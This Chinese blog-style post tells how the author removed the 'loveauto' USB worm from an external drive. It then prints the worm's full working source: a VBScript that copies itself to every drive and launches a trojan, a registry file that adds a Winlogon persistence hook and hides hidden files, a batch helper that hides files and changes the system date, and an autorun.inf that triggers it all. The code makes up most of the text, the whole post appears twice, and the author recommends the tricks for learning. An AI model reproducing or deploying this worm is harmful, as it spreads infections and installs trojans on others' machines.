上周移动硬盘出了点问题,让一个搞电子的朋友检查看看,昨天硬盘拿回来了,可以用了,多谢!
但是把移动硬盘接到电脑上后,在“我的电脑”无法打开盘符,提示“无法找到脚本loveauto.vbs”,一看是vbs,八成是这哥们机器中病毒了,感染到移动硬盘了!再一点右键,里面有“auto”,进一步证实了我的想法。
一般有“auto”菜单的都是盘符里面有个autorun.inf在作怪,既然右键不能进入盘符,那我就走歪门邪道,用cmd模式。
进入cmd模式,进入G:\盘,命令attrib,一看,果然,有几个loveauto.xxx文件,其属性都是SHR类型的,靠,弱智病毒!只能欺负不懂电脑的菜鸟!
敲命令attrib -s -h -r loveauto.xxx,然后一个个del loveauto.xxx,拔掉移动硬盘,再插入,病毒清除成功。
换个角度看问题,一般来说,作为病毒可以很容易入侵电脑并且随意传播的,都有一个特点:就是批处理(或自动运行)做的好。下面我们也来看看这个病毒的几个文件代码。
loveauto.vbs
---------------
on error resume next
Set WshShell =CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1) '得到特殊目录dir
if WScript.ScriptFullName="C:\loveauto.vbs" or WScript.ScriptFullName="D:\loveauto.vbs" or WScript.ScriptFullName="E:\loveauto.vbs" or WScript.ScriptFullName="F:\loveauto.vbs" or WScript.ScriptFullName="G:\loveauto.vbs" or WScript.ScriptFullName="H:\loveauto.vbs" or WScript.ScriptFullName="I:\loveauto.vbs" or WScript.ScriptFullName="J:\loveauto.vbs" or WScript.ScriptFullName="K:\loveauto.vbs" or WScript.ScriptFullName="L:\loveauto.vbs" or WScript.ScriptFullName="M:\loveauto.vbs" or WScript.ScriptFullName="N:\loveauto.vbs" or WScript.ScriptFullName="O:\loveauto.vbs" or WScript.ScriptFullName="P:\loveauto.vbs" or WScript.ScriptFullName="Q:\loveauto.vbs" or WScript.ScriptFullName="R:\loveauto.vbs" or WScript.ScriptFullName="S:\loveauto.vbs" or WScript.ScriptFullName="T:\loveauto.vbs" or WScript.ScriptFullName="U:\loveauto.vbs" or WScript.ScriptFullName="V:\loveauto.vbs" or WScript.ScriptFullName="W:\loveauto.vbs" or WScript.ScriptFullName="X:\loveauto.vbs" or WScript.ScriptFullName="Y:\loveauto.vbs" or WScript.ScriptFullName="Z:\loveauto.vbs" then
a=WshShell.Run("loveauto.bat open" ,0,False)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
If objFSO.FileExists(dir&"\loveauto.vbs") Then '判断系统是否已经被感染
wscript.sleep 10
else
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) '运行木马
a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
else
If objFSO.FileExists(dir&"\loveauto.vbs") Then
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
else
a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) '运行木马
a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",d&"\",True
Of.CopyFile "limt.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "loveauto.reg",d&"\",True
Of.CopyFile "loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
end if
---------------
loveauto.reg
---------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,loveauto.bat"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000000
"ValueName"="Hidden"
"DefaultValue"=dword:00000000
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
---------------
loveauto.bat
---------------
@echo off
if exist .\loveauto.reg regedit /s .\loveauto.reg
if "%1"=="open" goto open
if "%1"=="-" goto qu
if "%1"=="++" goto jiajia
if "%1"=="+" goto jia
if "%1"=="date" goto date
if "%1"=="hfd" goto hfd
goto start
:qu
attrib -s -a -h -r %2\loveauto.bat
attrib -s -a -h -r %2\loveauto.reg
attrib -s -a -h -r %2\autorun.inf
attrib -s -a -h -r %2\loveauto.vbs
attrib -s -a -h -r %2\limt.exe
exit
:jia
attrib +s +a +h +r %2\loveauto.bat
attrib +s +a +h +r %2\loveauto.reg
attrib +s +a +h +r %2\autorun.inf
attrib +s +a +h +r %2\loveauto.vbs
attrib +s +a +h +r %2\limt.exe
exit
:jiajia
attrib +s +a +h +r loveauto.bat
attrib +s +a +h +r loveauto.reg
attrib +s +a +h +r autorun.inf
attrib +s +a +h +r loveauto.vbs
attrib +s +a +h +r limt.exe
exit
:open
start explorer .\
exit
:date
date 1990-01-01
date 1990-01-01
exit
:hfd
date 2007-05-29
date %date%
exit
:start
start WScript.exe %SYSTEMROOT%\system32\loveauto.vbs&exit
:end
---------------
autorun.inf
---------------
[autorun]
open=WScript.exe loveauto.vbs
shellEXEcute=WScript.exe loveauto.vbs
shell\Auto\command=WScript.exe loveauto.vbs
shell\open=打开(&O)
shell\open\Command=WScript.exe .\loveauto.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe .\loveauto.vbs
---------------
在vbs和bat文件中,一些批处理的技巧,可以参考学习。
但是把移动硬盘接到电脑上后,在“我的电脑”无法打开盘符,提示“无法找到脚本loveauto.vbs”,一看是vbs,八成是这哥们机器中病毒了,感染到移动硬盘了!再一点右键,里面有“auto”,进一步证实了我的想法。
一般有“auto”菜单的都是盘符里面有个autorun.inf在作怪,既然右键不能进入盘符,那我就走歪门邪道,用cmd模式。
进入cmd模式,进入G:\盘,命令attrib,一看,果然,有几个loveauto.xxx文件,其属性都是SHR类型的,靠,弱智病毒!只能欺负不懂电脑的菜鸟!
敲命令attrib -s -h -r loveauto.xxx,然后一个个del loveauto.xxx,拔掉移动硬盘,再插入,病毒清除成功。
换个角度看问题,一般来说,作为病毒可以很容易入侵电脑并且随意传播的,都有一个特点:就是批处理(或自动运行)做的好。下面我们也来看看这个病毒的几个文件代码。
loveauto.vbs
---------------
on error resume next
Set WshShell =CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1) '得到特殊目录dir
if WScript.ScriptFullName="C:\loveauto.vbs" or WScript.ScriptFullName="D:\loveauto.vbs" or WScript.ScriptFullName="E:\loveauto.vbs" or WScript.ScriptFullName="F:\loveauto.vbs" or WScript.ScriptFullName="G:\loveauto.vbs" or WScript.ScriptFullName="H:\loveauto.vbs" or WScript.ScriptFullName="I:\loveauto.vbs" or WScript.ScriptFullName="J:\loveauto.vbs" or WScript.ScriptFullName="K:\loveauto.vbs" or WScript.ScriptFullName="L:\loveauto.vbs" or WScript.ScriptFullName="M:\loveauto.vbs" or WScript.ScriptFullName="N:\loveauto.vbs" or WScript.ScriptFullName="O:\loveauto.vbs" or WScript.ScriptFullName="P:\loveauto.vbs" or WScript.ScriptFullName="Q:\loveauto.vbs" or WScript.ScriptFullName="R:\loveauto.vbs" or WScript.ScriptFullName="S:\loveauto.vbs" or WScript.ScriptFullName="T:\loveauto.vbs" or WScript.ScriptFullName="U:\loveauto.vbs" or WScript.ScriptFullName="V:\loveauto.vbs" or WScript.ScriptFullName="W:\loveauto.vbs" or WScript.ScriptFullName="X:\loveauto.vbs" or WScript.ScriptFullName="Y:\loveauto.vbs" or WScript.ScriptFullName="Z:\loveauto.vbs" then
a=WshShell.Run("loveauto.bat open" ,0,False)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
If objFSO.FileExists(dir&"\loveauto.vbs") Then '判断系统是否已经被感染
wscript.sleep 10
else
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) '运行木马
a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
else
If objFSO.FileExists(dir&"\loveauto.vbs") Then
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile dir&"\loveauto.bat",d&"\",True
Of.CopyFile dir&"\limt.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\loveauto.reg",d&"\",True
Of.CopyFile dir&"\loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
else
a=WshShell.Run("loveauto.bat date " ,0,True) '修改时间
WScript.Sleep 15000
a=WshShell.Run("limt.exe" ,0,False) '运行木马
a=WshShell.Run("loveauto.bat hfd " ,0,False) '恢复时间
a=WshShell.Run("loveauto.bat - "&dir ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",dir&"\",True '如果未被感染 则复制文件
Of.CopyFile "limt.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "loveauto.reg",dir&"\",True
Of.CopyFile "loveauto.vbs",dir&"\",True
a=WshShell.Run("loveauto.bat + "&dir ,0,True)
For i=1 to 2
Set dc = Of.Drives '得到所有驱动器
For Each d In dc '遍历所有盘符并复制自我
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("loveauto.bat - "&d ,0,True)
a=WshShell.Run("loveauto.bat ++ " ,0,True)
Of.CopyFile "loveauto.bat",d&"\",True
Of.CopyFile "limt.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "loveauto.reg",d&"\",True
Of.CopyFile "loveauto.vbs",d&"\",True
a=WshShell.Run("loveauto.bat + "&d ,0,True)
end if
wscript.sleep 2000
next
wscript.sleep 50000
i=0
next
end if
end if
---------------
loveauto.reg
---------------
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,loveauto.bat"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000000
"ValueName"="Hidden"
"DefaultValue"=dword:00000000
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
---------------
loveauto.bat
---------------
@echo off
if exist .\loveauto.reg regedit /s .\loveauto.reg
if "%1"=="open" goto open
if "%1"=="-" goto qu
if "%1"=="++" goto jiajia
if "%1"=="+" goto jia
if "%1"=="date" goto date
if "%1"=="hfd" goto hfd
goto start
:qu
attrib -s -a -h -r %2\loveauto.bat
attrib -s -a -h -r %2\loveauto.reg
attrib -s -a -h -r %2\autorun.inf
attrib -s -a -h -r %2\loveauto.vbs
attrib -s -a -h -r %2\limt.exe
exit
:jia
attrib +s +a +h +r %2\loveauto.bat
attrib +s +a +h +r %2\loveauto.reg
attrib +s +a +h +r %2\autorun.inf
attrib +s +a +h +r %2\loveauto.vbs
attrib +s +a +h +r %2\limt.exe
exit
:jiajia
attrib +s +a +h +r loveauto.bat
attrib +s +a +h +r loveauto.reg
attrib +s +a +h +r autorun.inf
attrib +s +a +h +r loveauto.vbs
attrib +s +a +h +r limt.exe
exit
:open
start explorer .\
exit
:date
date 1990-01-01
date 1990-01-01
exit
:hfd
date 2007-05-29
date %date%
exit
:start
start WScript.exe %SYSTEMROOT%\system32\loveauto.vbs&exit
:end
---------------
autorun.inf
---------------
[autorun]
open=WScript.exe loveauto.vbs
shellEXEcute=WScript.exe loveauto.vbs
shell\Auto\command=WScript.exe loveauto.vbs
shell\open=打开(&O)
shell\open\Command=WScript.exe .\loveauto.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe .\loveauto.vbs
---------------
在vbs和bat文件中,一些批处理的技巧,可以参考学习。